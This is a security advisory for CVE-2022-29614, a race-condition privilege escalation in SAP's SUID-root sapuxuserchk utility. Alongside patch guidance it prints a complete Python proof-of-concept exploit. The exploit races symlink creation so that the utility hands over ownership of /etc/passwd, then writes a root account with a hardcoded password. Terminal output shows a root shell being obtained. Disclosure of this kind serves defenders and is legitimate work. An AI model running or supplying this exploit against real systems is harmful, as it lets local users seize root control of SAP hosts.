Introduction
A local privilege escalation vulnerability has been identified in the SAP® SAPControl Web Service Interface, specifically within the sapuxuserchk utility. This flaw allows a local attacker to gain root privileges by exploiting a race condition involving symbolic links. Immediate attention and action are recommended to secure affected systems.
Affected Product
- Product: SAP® SAPControl Web Service Interface (
sapuxuserchk) - CVE Number: CVE-2022-29614
- Impact: Medium
- Fixed Version: Refer to SAP® security note 3158619
Business Recommendation
Organizations using the affected SAP products should apply the security updates provided in SAP security note 3158619 as a priority. Timely installation of these patches is crucial to protect business-critical data and maintain system integrity.
Vulnerability Overview
Local Privilege Escalation (CVE-2022-29614)
The sapuxuserchk utility, which is set with SUID-root permissions, incorrectly follows symbolic links when creating temporary local logon tickets. This improper handling allows members of the sapsys group to exploit a race condition, potentially escalating their privileges to root on Unix systems.
Technical Details
The sapuxuserchk utility is invoked by sapcontrol to request temporary local logon tickets, creating them in the directory /usr/sap/A4H/D00/work/sapcontrol_logon/. For instance:
$ sapcontrol -nr 0 -function RequestLogonFile user0
$ ls -l logon*
-rw------- 1 secadm sapsys 40 Feb 25 08:58 logon0
-rw------- 1 user0 users 40 Feb 25 09:00 logon1
-rw------- 1 root root 40 Feb 25 09:01 logon2Because sapcontrol needs to create tickets for any system user, sapuxuserchk must run with root privileges:
$ ls -l sapuxuserchk
-rwsr-x--- 1 root sapsys 1312137 Feb 28 2019 sapuxuserchkWhen processing a request, sapuxuserchk reads an encrypted message containing the ticket path, username, and ticket data. An example of the plaintext message:
$ strings input-0-plaintext
SAPLOGONFILE /usr/sap/A4H/D00/work/sapcontrol_logon/logon1
user0
1133146902252676394602837452470900726967The utility performs a check to ensure the file doesn’t already exist before creating it. However, there’s a race condition between the stat and open system calls:
stat("/usr/sap/A4H/D00/work/sapcontrol_logon/logon1", 0x7ffc0d2e1530) = -1 ENOENT (No such file or directory)
open("/usr/sap/A4H/D00/work/sapcontrol_logon/logon1", O_RDWR|O_CREAT|O_TRUNC, 0600) = 3
fchown(3, 1000, 100)An attacker can exploit this by rapidly creating a symbolic link named logon1 pointing to a sensitive file (e.g., /etc/passwd) while simultaneously invoking sapuxuserchk. If timed correctly, the utility will change the ownership of the target file to the attacker’s user ID, granting unauthorized read-write access.
Proof of Concept
The following example demonstrates the exploitation process, where the attacker eventually gains root privileges after multiple attempts:
$ id
uid=1001(secadm) gid=474(sapsys) groups=474(sapsys),1000(sapinst)
$ ls -l /etc/passwd
-rw-r--r-- 1 root root 2517 Feb 25 00:47 /etc/passwd
$ python3 sapRace.py
this many tries: 629
[+] now login as saprace
$ su saprace
Password:
# id
uid=0(saprace) gid=0(root) groups=0(root)
# ls -l /etc/passwd
-rw-r--r-- 1 secadm sapsys 73 Feb 25 10:03 /etc/passwdPoC Script (saprace.py)
import sys, os, signal, base64, random, string
secadm_msg = b'O9OXlWwex4ddSI5vhXFfUQvZ8Td3NWzRNIb9QN6bHY764Z0zVNuVjFHRGhHEgYgwNQDnf0/bBwzlEXCSXFkhtiDqDohuyCxG4mtRqc86FlB6DTOjBY9o/6Cb3rRSZ58jggx71JXMRk21jW3gqdem+tmqHCnIumZjodk2cuk5/MY76dsD65s3j1XrQS0RT3gPaspl/6Yb842hbVTZXVRY3cHKzNq5tZMKB2LmyyslO4xCI00eBN6k6yEKNFLvMx8lYbAIaHcfdWu3pMWVIb9rT3BoTCHwi5hBz8dHk6usdEw05q/Xuxe28gxWCUZpN09sYsd/5R8HqqLfwyiNI7CTBCA3f+fHUweJPuteD5O8bwo/mEOShHimO1gPZzhBdow2C0JszYQeQpxgRtENXPUt2qgT7TJqmItxM0puB8ry0TnKJIbk5gj0smflBPBZyTDXl+qNUmgWL1dK/SBpTUErGMVXFVBi8bNDMSUhcJa+0IQlYSBHPln17kquqhGvlRYYZVJttDNoYcvBchc4HxHZmH5pHkD4fhbcQgFT0UFgceSH1j3sE6G/M/QM1X/vTVE4534XJ3mDcFk/brOYun1dawJ30BkJ9HbP5weihwRwspOq52qRZ9CXsnJCtFPNqNWNIe8BgQUW8WV7FkiDJ+Lpp0pq8KLlZ0Yomz46YfCHkag='
u1_passwd = "saprace:wPi023oIkjHdA:0:0::/root:/bin/sh\nsecadm:x:1001:474::/tmp:/bin/sh\n"
logon_symlink = "/usr/sap/A4H/D00/work/sapcontrol_logon/logon1"
target_file = "/etc/passwd"
g = 1024
if not os.path.isfile(logon_symlink):
os.system("touch " + logon_symlink)
secadm_msg = base64.b64decode(secadm_msg)
msg_file = '/tmp/msg' + ''.join(random.choice(string.ascii_letters) for i in range(8))
with open(msg_file, "wb") as f0:
f0.write(secadm_msg)
pid = os.fork()
if pid == 0:
j = 0
while True:
if j > g:
print('done')
os._exit(os.EX_OK)
j += 1
os.system("/usr/sap/A4H/D00/exe/sapuxuserchk < {0} > /dev/null".format(msg_file))
else:
i = 0
uid = os.getuid()
success = False
while not success:
if i > g:
print("[-] give up, link too many tries: " + str(i))
break
i += 1
try:
os.unlink(logon_symlink)
os.symlink(target_file, logon_symlink)
statinfo = os.stat(target_file)
if statinfo.st_uid == uid:
os.kill(pid, signal.SIGILL)
print("this many tries: " + str(i))
print("[+] now login as saprace")
with open(target_file, "w") as f:
f.write(u1_passwd)
success = True
except Exception as err:
print('[-] lost the race {0}'.format(err))
os.waitpid(pid, 0)
os.unlink(msg_file)Affected Versions
The vulnerability affects the following SAP products and versions:
- SAP NetWeaver AS ABAP, AS Java, ABAP Platform, and HANA Database:
- KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, 7.88
- KRNL64NUC 7.22, 7.22EXT, 7.49
- KRNL64UC 7.22, 7.22EXT, 7.49, 7.53
- SAPHOSTAGENT 7.2
Tested Vulnerable Version:
- Version: 753, Patch 400, Changelist 1906766
For detailed information, please refer to SAP’s official security patch day announcement: SAP Security Patch Day – May 2022
Conclusion
This vulnerability poses a significant security risk, allowing local attackers to escalate their privileges to root, potentially compromising the entire system. It is imperative for organizations using the affected SAP products to apply the recommended patches immediately to mitigate this risk.
